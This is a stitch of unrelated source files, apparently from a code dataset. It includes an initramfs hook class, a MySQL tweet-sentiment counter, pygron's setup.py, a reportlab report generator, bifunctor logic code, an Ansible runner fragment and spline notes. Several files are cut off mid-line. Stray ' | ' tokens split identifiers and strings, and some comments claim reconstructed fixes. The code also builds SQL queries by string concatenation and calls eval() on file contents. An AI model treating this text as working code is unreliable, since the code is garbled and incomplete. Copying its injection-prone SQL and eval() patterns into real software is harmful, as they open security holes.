# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pkg.libs.Tools import Tools
class Hook:
    """Base class for initramfs hooks.

    State lives in class-level attributes, so each Hook subclass acts
    as a singleton describing the files, directories and man pages it
    contributes to the initramfs.

    NOTE(review): these mutable class attributes are shared with any
    subclass that does not redefine them -- confirm every concrete hook
    overrides the lists it mutates.
    (Reconstructed: the ``_use`` initializer was corrupted by a stray
    ``|`` artifact; restored to 0.)
    """

    _use = 0             # non-zero when the hook is active
    _use_man = 0         # non-zero when man pages should be copied
    _files = []          # required files to copy into the initramfs
    _optional_files = [] # optional files
    _directories = []    # required directories
    _man = []            # man page files

    @classmethod
    def Enable(cls):
        """Enables this hook."""
        cls._use = 1

    @classmethod
    def Disable(cls):
        """Disables this hook."""
        cls._use = 0

    @classmethod
    def EnableMan(cls):
        """Enables copying the man pages."""
        cls._use_man = 1

    @classmethod
    def DisableMan(cls):
        """Disables copying the man pages."""
        cls._use_man = 0

    @classmethod
    def IsEnabled(cls):
        """Returns whether this hook is activated."""
        return cls._use

    @classmethod
    def IsManEnabled(cls):
        """Returns whether man pages will be copied."""
        return cls._use_man

    @classmethod
    def AddFile(cls, vFile):
        """Adds a required file to the hook to be copied into the initramfs."""
        cls._files.append(vFile)

    @classmethod
    def RemoveFile(cls, vFile):
        """Deletes a required file from the hook."""
        try:
            cls._files.remove(vFile)
        except ValueError:
            # Aborts the build with an error message.
            Tools.Fail('The file "' + vFile + '" was not found on the list!')

    @classmethod
    def PrintFiles(cls):
        """Prints the required files in this hook."""
        for file in cls.GetFiles():
            print("File: " + file)

    @classmethod
    def GetFiles(cls):
        """Returns the list of required files."""
        return cls._files

    @classmethod
    def GetOptionalFiles(cls):
        """Returns the list of optional files."""
        return cls._optional_files

    @classmethod
    def GetDirectories(cls):
        """Returns the list of required directories."""
        return cls._directories

    @classmethod
    def GetManPages(cls):
        """Returns the list of man page files for this hook."""
        return cls._man
|
AdamDynamic/TwitterMetrics | KeywordSearch.py | Python | gpl-2.0 | 7,402 | 0.010267 | #!/usr/bin/env python
import MySQLdb
import string
import logging
import Reference as r
def CalculateWordCount(InputList, MatchList):
    """Count how often the words of InputList occur in MatchList.

    Each input word contributes its number of occurrences in MatchList,
    so duplicated input words are counted every time they appear.
    """
    return sum(MatchList.count(word) for word in InputList)
def ReturnQueryAsList(cur, Query):
    '''Runs a query on the database and returns the results as a list.

    Only the first column of each fetched row is kept.
    '''
    cur.execute(Query)
    ResultsTuple = cur.fetchall()
    ResultsList = [row[0] for row in ResultsTuple]
    return ResultsList
def SentenceToList(sentence):
    '''Drop ASCII punctuation from a sentence and return its words.'''
    punctuation = set(string.punctuation)
    kept = [symbol for symbol in sentence if symbol not in punctuation]
    return ''.join(kept).split()
def GetSearchResults(cur):
    '''Returns from the database the list of most recently searched tweets.

    Only tweets present in the "new" search-results table but absent
    from the "old" one (matched on tweet id) are returned.
    '''
    # Select only those search terms that are new since the last search was performed
    QUERY_SEARCHRESULTS_TEXT = "SELECT new." + r.SR_FIELD_SEARCHRESULT + " \
                                FROM " + r.DB_TABLE_SEARCHRESULTS_NEW + " AS new \
                                WHERE new." + r.SR_FIELD_TWEETID + " NOT IN( \
                                SELECT old." + r.SR_FIELD_TWEETID + " \
                                FROM " + r.DB_TABLE_SEARCHRESULTS_OLD + " AS old \
                                WHERE new." + r.SR_FIELD_TWEETID + " = old." + r.SR_FIELD_TWEETID + ");"
    SearchResultsList = ReturnQueryAsList(cur, QUERY_SEARCHRESULTS_TEXT)
    logging.debug(QUERY_SEARCHRESULTS_TEXT)
    return SearchResultsList
def InsertResultsIntoDatabase(cur, TimeStamp, ResultsDict, TotalTweets, TotalWords):
    '''Inserts the results of the keyword search back into the database.

    Always returns True; errors from cur.execute propagate to the caller.
    '''
    # NOTE(review): the statement is built by string concatenation. The
    # counters are ints, but TimeStamp is interpolated unescaped -- if
    # it can ever come from untrusted input this is SQL injection;
    # consider a parameterized query (cur.execute(sql, params)).
    # Define the columns the values will be entered into
    InsertResultsQuery = "INSERT INTO " + r.DB_TABLE_KEYWORDSRESULTS + " ( " + r.WL_FIELD_TIMESTAMP + ", " + r.WL_FIELD_POSITIVE + "\
                        , " + r.WL_FIELD_NEGATIVE + ", " + r.WL_FIELD_STRONG + ", " + r.WL_FIELD_HOSTILE + "\
                        , " + r.WL_FIELD_POWER + ", " + r.WL_FIELD_WEAK + ", " + r.WL_FIELD_ACTIVE + "\
                        , " + r.WL_FIELD_PASSIVE + ", " + r.WL_FIELD_PAIN + ", " + r.WL_FIELD_PLEASURE + "\
                        , " + r.WL_FIELD_TWEETSTOTAL + ", " + r.WL_FIELD_WORDSTOTAL + ") VALUES ('" + TimeStamp + "', " + str(ResultsDict['positive']) + "\
                        , " + str(ResultsDict['negative']) + ", " + str(ResultsDict['strong']) + ", " + str(ResultsDict['hostile']) + ", " + str(ResultsDict['power']) + "\
                        , " + str(ResultsDict['weak']) + ", " + str(ResultsDict['active']) + ", " + str(ResultsDict['passive']) + ", " + str(ResultsDict['pain']) + "\
                        , " + str(ResultsDict['pleasure']) + ", " + str(TotalTweets) + ", " + str(TotalWords)+ ");"
    logging.debug(InsertResultsQuery)
    cur.execute (InsertResultsQuery)
    return True
def SearchTweetsForKeywords(TimeStamp):
    '''Retrieve new tweets from the database and count sentiment keywords.

    For every new search result, counts occurrences of words from each
    sentiment word list and stores the totals, tagged with TimeStamp,
    back into the results table. Returns True on success, False
    otherwise.
    '''
    FN_NAME = "SearchTweetsForKeywords"
    ProcessResult = False
    # Establish the connection to the database
    db = MySQLdb.connect(
        host=r.DB_HOST,
        user=r.DB_USER,
        passwd=r.DB_PASSWORD,
        db=r.DB_NAME
    )
    cur = db.cursor()
    # One word list per sentiment category. Data-driven replacement for
    # ten near-identical query constants and counter updates (two of
    # which had been corrupted by stray "|" artifacts).
    categories = ['positive', 'negative', 'strong', 'hostile', 'power',
                  'weak', 'active', 'passive', 'pain', 'pleasure']
    word_lists = {}
    for category in categories:
        query = ("SELECT Word FROM " + r.DB_TABLE_WORDLISTS +
                 " WHERE Category = '" + category + "'")
        word_lists[category] = ReturnQueryAsList(cur, query)
    # Retrieve the contents of the tbl_SearchResults table
    SearchResults = GetSearchResults(cur)
    TotalTweets = 0
    TotalWords = 0
    # Same keys as before, including the unused 'timestamp' slot.
    ResultsDict = {'timestamp': 0}
    for category in categories:
        ResultsDict[category] = 0
    # Calculate the wordcounts for each search result against each of
    # the keyword lists.
    for Result in SearchResults:
        ResultAsList = SentenceToList(Result)
        TotalTweets = TotalTweets + 1
        TotalWords = TotalWords + len(ResultAsList)
        for category in categories:
            ResultsDict[category] += CalculateWordCount(ResultAsList, word_lists[category])
    if InsertResultsIntoDatabase(cur, TimeStamp, ResultsDict, TotalTweets, TotalWords) == True:
        db.commit()
        ProcessResult = True
    # Bug fix: the original evaluated `db.close` without calling it, so
    # the connection was never closed.
    db.close()
    logging.info('%s - Retrieved %s tweets containing %s words with result %s', FN_NAME, TotalTweets, TotalWords, ProcessResult)
    return ProcessResult
|
# pygron packaging metadata. (Reconstructed: the import line was
# corrupted by dataset separator artifacts -- "find_pack | ages".)
from setuptools import setup, find_packages

setup(
    name='pygron',
    version='0.3.1',
    license='MIT',
    author='Akshay B N',
    description='Helps JSON become greppable',
    zip_safe=False,
    url='https://github.com/akshbn/pygron',
    packages=find_packages(),
    entry_points={"console_scripts": ["pygron=pygron.cli_entry:main"]},
)
|
xhan-shannon/SystemControlView | utils/ReportGenerator.py | Python | gpl-2.0 | 460,449 | 0.012301 | #!/usr/bin/python
""" The report generator handles commands from the user to configure reports,
then obtains the data from the requested file,
then writes the report file.
"""
import rxt
import os
import sys
import locale
import traceback
import simpl
import simplejson
import time
import datetime
import csv
import shutil
import copy
import ConfigParser
import logging
import BaseJSONListener
import SrDB
import bz2
import tarfile
import re
import sets
import types
import codecs
import reportlab
import BusyBoa
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, A4
from reportlab.graphics import renderPDF
from reportlab.lib import colors
from reportlab.lib.colors import Color
from reportlab.graphics.shapes import Drawing
from reportlab.graphics.charts.barcharts import VerticalBarChart
# Tables
from reportlab.tools.docco.rl_doc_utils import *
# Platypus
from reportlab.platypus import Frame, PageTemplate, SimpleDocTemplate, Paragraph, Spacer, PageBreak, tableofcontents, TableStyle
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.rl_config import defaultPageSize
from reportlab.lib.units import inch, mm
from reportlab.pdfbase import pdfmetrics
from reportlab.lib.utils import ImageReader
#import pdb
page_size = 15 # Should be equal with module constant!!!
normal_event_page = 500 # This is for the basic event constant
class reportGenerator(BaseJSONListener.BaseJSONListener):
    """reportGenerator class
    Make reports from result *.json files in report_temp folder.
    """
    # Alias so code using this class can catch the listener's user-error type.
    MyJSONUserError = BaseJSONListener.JSONUserError
    # strftime format applied to timestamps rendered into reports
    # (see do_SET_DATE_FORMAT).
    date_format = '%Y-%m-%d %H:%M:%S'
    # Class-level (shared) report header fields; updated by do_SET_REPORT_INFO
    # and persisted to the data-entry file between runs.
    report_info = { 'custname' : '',
                    'contactname' : '',
                    'custaddress' : '',
                    'custemail' : '',
                    'custphone' : '',
                    'username' : '',
                    'title' : '',
                    'useraddress' : '',
                    'useremail' : '',
                    'userphone' : '',
                    'ticketid' : '',
                    'note' : '',
                    'comment1' : '',
                    'comment2' : '',
                    'comment3' : ''
                  }
    # When True, write_log also echoes messages to stdout.
    debug = False
    #debug = True
    def __init__(self,_debug = False):
        """Read paths from /etc/rxt.conf, create the temp/report folders,
        reload any previously saved report-info data entry, configure
        locale-aware number formatting, and prepare the report data font.
        """
        self.debug = _debug
        BaseJSONListener.BaseJSONListener.__init__(self, 'Report Generator')
        cfg_file = ConfigParser.ConfigParser()
        cfg_file.read('/etc/rxt.conf')
        id = 'System Files'
        self.temp_report_path = cfg_file.get(id, 'basedir') + 'report_temp'
        self.report_path = cfg_file.get(id, 'report')
        self.data_entry_file = cfg_file.get(id, 'data_entry')
        # NOTE(review): the format string below appears corrupted by a
        # dataset separator (" | "); presumably 'temp=%s, report=%s'.
        self.write_log('temp=%s, re | port=%s' % (self.temp_report_path, self.report_path))
        # Create the temporary report folder if it does not exist.
        if not os.path.isdir(self.temp_report_path):
            try:
                os.mkdir(self.temp_report_path)
            except:
                self.write_log('Test Cannot Create %s' % self.temp_report_path, 'Error', sys.exc_info())
        # Create the final report output folder if it does not exist.
        if not os.path.isdir(self.report_path):
            try:
                os.mkdir(self.report_path)
            except:
                self.write_log('Test Cannot Create %s' % self.report_path, 'Error', sys.exc_info())
        # Reload the previously saved report header fields (best effort).
        data = None
        try:
            f_info = open(self.data_entry_file, 'r')
            data = f_info.read()
            f_info.close()
        except:
            self.write_log('Failed to load file "%s"!' % self.data_entry_file, 'Error', sys.exc_info())
        if data is not None:
            try:
                # File stores the repr of a dict written by do_SET_REPORT_INFO.
                reportGenerator.report_info = eval(data)
            except:
                self.write_log('Failed to eval saved report info!', 'Error', sys.exc_info())
        # Locale-aware number formatting (thousands separators in reports).
        locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
        self.write_log(locale.getlocale(), 'Locale:')
        self.write_log(locale.format('%.2f', 10250456.10, True), 'Number format:')
        # Register the font/encoding used for report data cells.
        #pdfmetrics._py_getFont(dataFontType) # not support on hw
        pdfmetrics.getEncoding(reportEncoding)
        pdfmetrics.getTypeFace(dataFontType)
        self.dataFont = pdfmetrics.Font(dataFontType, dataFontType, reportEncoding)
    def write_log(self, message, type = 'Info', ex = None):
        """Log *message*; in debug mode also echo it to stdout.

        :param message: text (or object) to log
        :param type: severity label; 'Error' logs at error level
        :param ex: optional sys.exc_info() triple whose type/value/traceback
                   are printed in debug mode
        """
        if self.debug:
            print '[REPGEN]\t%s\t%s' % (type, message)
            if ex is not None:
                print '[REPGEN]\tError Type:\t%s' % ex[0]
                print '[REPGEN]\tError Value:\t%s ' % ex[1]
                print '[REPGEN]\tTraceback:\t%s\n' % traceback.extract_tb(ex[2])
        # 'Error' type or any supplied exception escalates to error level.
        if type == 'Error' or ex is not None:
            self.log.error(message)
        else:
            self.log.debug(message)
    def send_INTERNAL_CMD(self, cmd):
        """Send *cmd* (JSON-encoded) to the next server in the chain.

        Blocks, retrying every 0.5s, until the server name resolves via
        simpl.name_locate.  Returns the decoded JSON reply, or None if no
        server id could be resolved.
        (self.next_server_id / self.next_server_name are presumably set by
        the BaseJSONListener base class — confirm.)
        """
        while (self.next_server_id == None):
            try:
                self.next_server_id = simpl.name_locate(self.next_server_name)
            except simpl.error, reason:
                self.write_log('Name locate error (%s) looking for %s'
                               % (reason, self.next_server_name), 'Error', sys.exc_info())
            except:
                self.write_log('Other Exception.', 'Error', sys.exc_info())
            time.sleep(0.5)
        if self.next_server_id is not None:
            return simplejson.loads(simpl.Send(self.next_server_id, simplejson.dumps(cmd), 1))
        else:
            self.write_log('Error in send_INTERNAL_CMD\n', 'Error')
            return None
    def do_SET_DATE_FORMAT(self, params):
        """Store the strftime format from params['format'] used when
        rendering timestamps into reports."""
        self.date_format = params['format']
        self.write_log("Setting Date Format: %s" % self.date_format)
def do_SET_REPORT_INFO (self, params):
"""Receive messages from other processes to configure and create reports
@type params: dictionary
@param params: command received by the "reportGenerator"
@return: dictionary
"""
params.pop('')
reportGenerator.report_info.update(params)
try:
f_info = open(self.data_entry_file, 'w')
f_info.write(str(reportGenerator.report_info))
f_info.close()
except:
self.write_log('Failed to write file "%s"!' % self.data_entry_file, 'Error', sys.exc_info())
resp = {}
resp['_'] = 'SET-REPORT-INFO'
resp['rc'] = 0
resp['cmdresp'] = 0
return resp
def do_RTRV_REPORT_INFO (self, params):
"""Receive messages from other processes to configure and create reports
@type params: dictionary
@param params: command received by the "reportGenerator"
@return: dictionary
"""
resp = {}
resp = reportGenerator.report_info
resp['_'] = 'RTRV-REPORT-INFO'
return resp
def read_data_from_files(self, params):
file_lookup = {0: 'config',
1: 'vcat',
2: 'result_otn',
3: 'result_sonet',
4: 'result_sdh',
5: 'result_wan',
7: 'result_rfc2544',
8: 'result_iptest',
9: 'result_loopback',
10: 'result_monitor',
11: 'result_e4',
12: 'result_e3',
13: 'result_e2',
14: 'result_e1',
15: 'result_ds3',
16: 'result_ds2',
17: 'result_ds1',
18: 'result_error',
19: 'result_y156sam',
20: 'result_fc_bert',
21: 'result_fc_rfc2544',
22: 'result_fc_loopback',
23: 'result_fc_b2b',
24: 'result_capture',
25: 'mo |
koreiklein/fantasia | calculus/basic/bifunctor.py | Python | gpl-2.0 | 13,217 | 0.019747 | # Copyright (C) 2013 Korei Klein <korei.klein1@gmail.com>
from misc import *
from calculus import variable
from lib import common_vars
from lib.common_symbols import domainSymbol, relationSymbol, leftSymbol, rightSymbol
from calculus.basic import endofunctor
from calculus.basic import formula
class UntransportableException(Exception):
  """Raised when a formula cannot be transported across a bifunctor.

  Wraps the UnliftableException that caused the failure.
  """
  def __init__(self, unliftableException):
    self.unliftableException = unliftableException
  def __str__(self):
    return "UntransportableException caused by \n{0}".format(self.unliftableException)

class UntransportingOrException(UntransportableException):
  """Raised when a formula B cannot be transported through an Or bifunctor."""
  def __init__(self, B):
    self.B = B
  def __str__(self):
    return "UntransportingOrException can't transport {0}".format(self.B)
class Bifunctor:
  """Abstract base for bifunctors F(., .) on formulas.

  Subclasses implement the object/arrow actions and the import/lift
  natural transforms; transport and (pre/post)composition are derived here.
  """
  def onObjects(self, left, right):
    raise Exception("Abstract superclass.")
  def onArrows(self, left, right):
    raise Exception("Abstract superclass.")
  # return a function representing a natural transform F(., .) o (B|.) --> F(B|., B|.)
  def _import(self, B):
    raise Exception("Abstract superclass.")
  # return those variable quantified anywhere in self.
  def variables(self):
    raise Exception("Abstract superclass.")
  # a natural transform B|F(., .) --> F(B|., .)
  def _importLeft(self, B):
    raise Exception("Abstract superclass.")
  # a natural transform B|F(., .) --> F(., B|.)
  def _importRight(self, B):
    raise Exception("Abstract superclass.")
  # a natural transform F(B|., .) --> B|(F., .)
  # or raise an UnliftableException
  def _liftLeft(self, B):
    raise endofunctor.UnliftableException(self, B)
  # a natural transform F(., B|.) --> B|(F., .)
  # or raise an UnliftableException
  def _liftRight(self, B):
    raise endofunctor.UnliftableException(self, B)
  # B: an enriched formula such that B.forwardCopy() is defined.
  # return a function representing a natural transform: F(B, .) --> F(B, B|.)
  def transport_duplicating(self, B):
    # F(B, x) --> F(B|B, x) --> F(B, B|x)
    return (lambda x:
        self.onArrows(B.forwardCopy(), x.identity()).forwardCompose(
          self.transport(B)(B, x)))
  # return a function representing a natural transform: F(B|., .) --> F(., B|.) if possible,
  # otherwise, raise an intransportable exception.
  def transport(self, B):
    try:
      lifted = self._liftLeft(B)
    except endofunctor.UnliftableException as e:
      raise UntransportableException(e)
    # F(B|., .) --> B|F(., .) --> F(., B|.)
    return (lambda x, y:
        lifted(x, y).forwardCompose(self._importRight(B)(x, y)))
  def precompose(self, left, right):
    # Both precomposed endofunctors must be covariant.
    assert(left.covariant())
    assert(right.covariant())
    return PrecompositeBifunctor(self, left, right)
  def precomposeLeft(self, left):
    return self.precompose(left = left, right = endofunctor.identity_functor)
  def precomposeRight(self, right):
    return self.precompose(left = endofunctor.identity_functor, right = right)
  def compose(self, other):
    assert(other.covariant())
    return PostcompositeBifunctor(self, other)
  def join(self):
    return Join(self)
  def commute(self):
    # Swap the two arguments: commute(F)(x, y) = F(y, x).
    return Commute(self)
class Commute(Bifunctor):
  """The bifunctor obtained from another by swapping its two arguments:
  Commute(F)(x, y) = F(y, x).

  Every operation delegates to the wrapped bifunctor with the arguments
  (and the left/right import/lift directions) flipped.
  """
  def __init__(self, bifunctor):
    self.bifunctor = bifunctor
  def __repr__(self):
    return "commute %s"%(self.bifunctor,)
  def onObjects(self, left, right):
    return self.bifunctor.onObjects(right, left)
  def onArrows(self, left, right):
    return self.bifunctor.onArrows(right, left)
  def _import(self, B):
    return (lambda x, y:
        self.bifunctor._import(B)(y, x))
  def variables(self):
    return self.bifunctor.variables()
  # BUGFIX: the two 'def' lines below were garbled (stray ' | ' tokens) in
  # this copy of the file; reconstructed from the Bifunctor interface.
  def _importLeft(self, B):
    return (lambda x, y:
        self.bifunctor._importRight(B)(y, x))
  def _importRight(self, B):
    return (lambda x, y:
        self.bifunctor._importLeft(B)(y, x))
  def _liftLeft(self, B):
    # May throw an exception.
    lift = self.bifunctor._liftRight(B)
    return (lambda x, y:
        lift(y, x))
  def _liftRight(self, B):
    # May throw an exception.
    lift = self.bifunctor._liftLeft(B)
    return (lambda x, y:
        lift(y, x))
class And(Bifunctor):
  """The conjunction bifunctor: (left, right) |-> left | right."""
  def __repr__(self):
    return "AND"
  def onObjects(self, left, right):
    return formula.And(left, right)
  def onArrows(self, left, right):
    return formula.OnAnd(left, right)
  def variables(self):
    # And quantifies no variables of its own.
    return []
  def _import(self, B):
    # B|(x|y) --> (B|B)|(x|y) --> B|(B|(x|y)) --> B|((B|x)|y) --> (B|x)|(B|y)
    return (lambda x, y:
        formula.And(B, formula.And(x, y)).forwardOnLeftFollow(lambda f:
          f.forwardCopy()).forwardFollow(lambda f:
          f.forwardAssociate()).forwardFollow(lambda f:
          f.forwardOnRight(self._importLeft(B)(x, y))).forwardCompose(
            self._importRight(B)(formula.And(B, x), y)))
  def _liftLeft(self, B):
    # ((B|x)|y) --> B|(x|y)
    return (lambda x, y: self.onObjects(formula.And(B, x), y).forwardAssociate())
  def _liftRight(self, B):
    # (x|(B|y)) --> (x|B)|y --> (B|x)|y --> B|(x|y)
    return (lambda x, y:
        self.onObjects(x, formula.And(B, y)).forwardAssociateOther().forwardFollow(lambda x:
          x.forwardOnLeftFollow(lambda x:
            x.forwardCommute()).forwardFollow(lambda x:
            x.forwardAssociate())))
  def _importLeft(self, B):
    # B|(x|y) --> (B|x)|y
    return (lambda x, y: formula.And(B, formula.And(x, y)).forwardAssociateOther())
  def _importRight(self, B):
    # B|(x|y) --> (x|y)|B --> x|(y|B) --> x|(B|y)
    return (lambda x, y:
        formula.And(B, formula.And(x, y)).forwardCommute().forwardFollow(lambda x:
          x.forwardAssociate()).forwardFollow(lambda x:
          x.forwardOnRightFollow(lambda x:
            x.forwardCommute())))
# Shared instance of the conjunction bifunctor.
and_functor = And()
class Or(Bifunctor):
  """The disjunction bifunctor: (left, right) |-> left - right."""
  def __repr__(self):
    return "OR"
  def onObjects(self, left, right):
    return formula.Or(left, right)
  def onArrows(self, left, right):
    return formula.OnOr(left, right)
  def variables(self):
    # Or quantifies no variables of its own.
    return []
  def _import(self, B):
    # B|(x-y) --> (B|x)-(B|y)  (distribute conjunction over disjunction)
    # (forwardDistibute: spelling matches the formula module's method name.)
    return (lambda x, y:
        formula.And(B, formula.Or(x, y)).forwardDistibute())
  def _importLeft(self, B):
    # B|(x-y) --> (B|x)-(B|y) --> (B|x)-y   (forget B on the right branch)
    # BUGFIX: _import takes the imported formula B and returns a binary
    # natural transform; the original called self._import(x, y), which
    # passed the wrong arguments and raised a TypeError at runtime.
    return (lambda x, y:
        self._import(B)(x, y).forwardCompose(self.onArrows(formula.And(B, x).identity(),
          formula.And(B.updateVariables(), y).forwardForgetLeft())))
  def _importRight(self, B):
    # B|(x-y) --> (B|x)-(B|y) --> x-(B|y)   (forget B on the left branch)
    # BUGFIX: same _import calling convention fix as _importLeft.
    return (lambda x, y:
        self._import(B)(x, y).forwardCompose(self.onArrows(formula.And(B, x).forwardForgetLeft(),
          formula.And(B.updateVariables(), y).identity())))
# Shared instance of the disjunction bifunctor.
or_functor = Or()
class PostcompositeBifunctor(Bifunctor):
def __init__(self, bifunctor, functor):
self.bifunctor = bifunctor
self.functor = functor
def __repr__(self):
return "%s . %s"%(self.bifunctor, self.functor)
def variables(self):
result = []
result.extend(self.bifunctor.variables())
result.extend(self.functor.variables())
return result
def _liftLeft(self, B):
# The following two lines may throw an exception
bifunctor_nt = self.bifunctor._liftLeft(B)
functor_nt = self.functor.lift(B)
return (lambda x, y:
self.functor.onArrow(bifunctor_nt(x, y)).forwardCompose(
functor_nt(self.bifunctor.onObjects(x, y))))
def _liftRight(self, B):
# The following two lines may throw an exception
bifunctor_nt = self.bifunctor._liftRight(B)
functor_nt = self.functor.lift(B)
return (lambda x, y:
self.functor.onArrow(bifunctor_nt(x, y)).forwardCompose(
functor_nt(self.bifunctor.onObjects(x, y))))
def onArrows(self, left, right):
return self.functor.onArrow(self.bifunctor.onArrows(left, right))
def onObjects(self, left, right):
return self.functor.onObject(self.bifunctor.onObjects(left, right))
def precompose(self, left, right):
return PostcompositeBifunctor(bifunctor = self.bifunctor.precompose(left, right),
functor = self.functor)
def compose(self, other):
return PostcompositeBifunctor(bifunctor = self.bifunctor, functor = self.functor.compose(other))
def _import(self, B):
return (lambda left, right:
self.functor._import(B)(self.bifunctor.onObjects(left, right)).forwardCompose(
self.functor.onArrow |
dlundquist/ansible | lib/ansible/runner/__init__.py | Python | gpl-3.0 | 55,816 | 0.005518 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import multiprocessing
import signal
import os
import pwd
import Queue
import random
import traceback
import tempfile
import time
import collections
import socket
import base64
import sys
import pipes
import jinja2
import subprocess
import getpass
import ansible.constants as C
import ansible.inventory
from ansible import utils
from ansible.utils import template
from ansible.utils import check_conditional
from ansible.utils import string_functions
from ansible import errors
from ansible import module_common
import poller
import connection
from return_data import ReturnData
from ansible.callbacks import DefaultRunnerCallbacks, vv
from ansible.module_common import ModuleReplacer
module_replacer = ModuleReplacer(strip_comments=False)
HAS_ATFORK=True
try:
from Crypto.Random import atfork
except ImportError:
HAS_ATFORK=False
multiprocessing_runner = None
OUTPUT_LOCKFILE = tempfile.TemporaryFile()
PROCESS_LOCKFILE = tempfile.TemporaryFile()
################################################
def _executor_hook(job_queue, result_queue, new_stdin):
    """Worker-process entry point: drain hosts from job_queue, run the
    module-level multiprocessing_runner's _executor on each, and push each
    result onto result_queue.  SIGINT is ignored so only the parent process
    handles keyboard interrupts.
    """
    # attempt workaround of https://github.com/newsapps/beeswithmachineguns/issues/17
    # this function also not present in CentOS 6
    if HAS_ATFORK:
        atfork()
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    while not job_queue.empty():
        try:
            host = job_queue.get(block=False)
            return_data = multiprocessing_runner._executor(host, new_stdin)
            result_queue.put(return_data)
        except Queue.Empty:
            # Another worker drained the queue between empty() and get().
            pass
        except:
            # Print unexpected per-host failures without killing the worker.
            traceback.print_exc()
class HostVars(dict):
    """A lazy view over vars_cache that merges in inventory variables.

    Plain dict access returns only the cached vars; indexing by host via
    __getitem__ computes inventory variables overlaid with the cache, and
    memoizes the merged result per host in ``self.lookup``.
    """

    def __init__(self, vars_cache, inventory, vault_password=None):
        self.vars_cache = vars_cache
        self.inventory = inventory
        self.lookup = {}
        self.update(vars_cache)
        self.vault_password = vault_password

    def __getitem__(self, host):
        merged = self.lookup.get(host)
        if merged is None:
            # Inventory vars form the base; cached vars win on conflict.
            merged = self.inventory.get_variables(host, vault_password=self.vault_password)
            merged.update(self.vars_cache.get(host, {}))
            self.lookup[host] = merged
        return merged
class Runner(object):
''' core API interface to ansible '''
# see bin/ansible for how this is used...
def __init__(self,
host_list=C.DEFAULT_HOST_LIST, # ex: /etc/ansible/hosts, legacy usage
module_path=None, # ex: /usr/share/ansible
module_name=C.DEFAULT_MODULE_NAME, # ex: copy
module_args=C.DEFAULT_MODULE_ARGS, # ex: "src=/tmp/a dest=/tmp/b"
forks=C.DEFAULT_FORKS, # parallelism level
timeout=C.DEFAULT_TIMEOUT, # SSH timeout
pattern=C.DEFAULT_PATTERN, # which hosts? ex: 'all', 'acme.example.org'
remote_user=C.DEFAULT_REMOTE_USER, # ex: 'username'
remote_pass=C.DEFAULT_REMOTE_PASS, # ex: 'password123' or None if using key
remote_port=None, # if SSH on different ports
private_key_file=C.DEFAULT_PRIVATE_KEY_FILE, # if not using keys/passwords
sudo_pass=C.DEFAULT_SUDO_PASS, # ex: 'password123' or None
background=0, # async poll every X seconds, else 0 for non-async
basedir=None, # directory of playbook, if applicable
setup_cache=None, # used to share fact data w/ other tasks
| vars_cache=None, # used to store variables about hosts
tr | ansport=C.DEFAULT_TRANSPORT, # 'ssh', 'paramiko', 'local'
conditional='True', # run only if this fact expression evals to true
callbacks=None, # used for output
sudo=False, # whether to run sudo or not
sudo_user=C.DEFAULT_SUDO_USER, # ex: 'root'
module_vars=None, # a playbooks internals thing
default_vars=None, # ditto
is_playbook=False, # running from playbook or not?
inventory=None, # reference to Inventory object
subset=None, # subset pattern
check=False, # don't make any changes, just try to probe for potential changes
diff=False, # whether to show diffs for template files that change
environment=None, # environment variables (as dict) to use inside the command
complex_args=None, # structured data in addition to module_args, must be a dict
error_on_undefined_vars=C.DEFAULT_UNDEFINED_VAR_BEHAVIOR, # ex. False
accelerate=False, # use accelerated connection
accelerate_ipv6=False, # accelerated connection w/ IPv6
accelerate_port=None, # port to use with accelerated connection
su=False, # Are we running our command via su?
su_user=None, # User to su to when running command, ex: 'root'
su_pass=C.DEFAULT_SU_PASS,
vault_pass=None,
run_hosts=None, # an optional list of pre-calculated hosts to run on
no_log=False, # option to enable/disable logging for a given task
):
# used to lock multiprocess inputs and outputs at various levels
self.output_lockfile = OUTPUT_LOCKFILE
self.process_lockfile = PROCESS_LOCKFILE
if not complex_args:
complex_args = {}
# storage & defaults
self.check = check
self.diff = diff
self.setup_cache = utils.default(setup_cache, lambda: collections.defaultdict(dict))
self.vars_cache = utils.default(vars_cache, lambda: collections.defaultdict(dict))
self.basedir = utils.default(basedir, lambda: os.getcwd())
self.callbacks = utils.default(callbacks, lambda: DefaultRunnerCallbacks())
self.generated_jid = str(random.randint(0, 999999999999))
self.transport = transport
self.inventory = utils.default(inventory, lambda: ansible.inventory.Inventory(host_list))
self.module_vars = utils.default(module_vars, lambda: {})
self.default_vars = utils.default(default_vars, lambda: {})
self.always_run = None
self.connector = connection.Connection(self)
self.conditional = conditional
self.module_name = module_name
self.forks = int(forks)
self.pattern = pattern
self.module_args = module_args
self.timeout = timeout
self.remote_user = remote_user
self.remote_pass = remote_pass
self.remote_port = remote_port
self.private_key_file = private_key_file
self.background = background
self.sudo = sudo
self.sudo_user_var = sudo_user
self.sudo_user = None
self.sudo_pass = sudo_pass
self.is_playbook = is_playbook
self.environment = environment
self.complex_args = complex_args
self.error_on_undefined_vars = error_on_undefined_vars
|
dyf/primopt | spline.py | Python | bsd-2-clause | 1,314 | 0.019787 | import numpy as np
# f(x) = a*x*x*x + b*x*x + c*x + d
# f'(x) = 3*a*x*x + 2*b*x + c
#
# d = x0
# c = dx0
# a + b + c + d = x1
# 3*a + 2*b + c = dx1
#
# a + b + dx0 + x0 = x1
# a + b = x1 - x0 - dx0
# a = x1 - x0 - dx0 - b
#
# 3*a + 2*b + dx0 = dx1
# 3*a + 2*b = dx1 - dx0
# 3*(x1 - x0 - dx0 - b) + 2*b = dx1 - dx0
# -3*b + 2*b = dx1 - dx0 - 3*(x1 - x0 - dx0)
# b = -dx1 + dx0 + 3*(x1 - x0 - dx0)
#
# a = x1 - x0 - dx0 - 0.5 * (dx1 - dx0 - 3*(x1 - x0 - dx0))
